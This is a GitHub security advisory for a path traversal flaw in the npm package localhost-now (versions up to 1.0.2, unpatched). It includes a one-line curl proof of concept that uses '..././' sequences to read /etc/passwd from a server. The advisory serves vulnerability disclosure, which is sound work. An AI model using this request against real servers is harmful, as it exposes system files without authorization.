Skip to content

Path Traversal in localhost-now

High severity GitHub Reviewed Published Jun 11, 2019 to the GitHub Advisory Database • Updated Jan 9, 2023

Package

npm localhost-now (npm)

Affected versions

<= 1.0.2

Patched versions

None

Description

All versions of localhost-now are vulnerable to path traversal. This vulnerability is a bypass to the path traversal fix introduced in version 1.0.2

Proof of concept:

$ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd"

Recommendation

No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.

References

Reviewed Jun 11, 2019
Published to the GitHub Advisory Database Jun 11, 2019
Last updated Jan 9, 2023

Severity

High

EPSS score

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-73cw-jxmm-qpgh

Source code

No known source code
Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.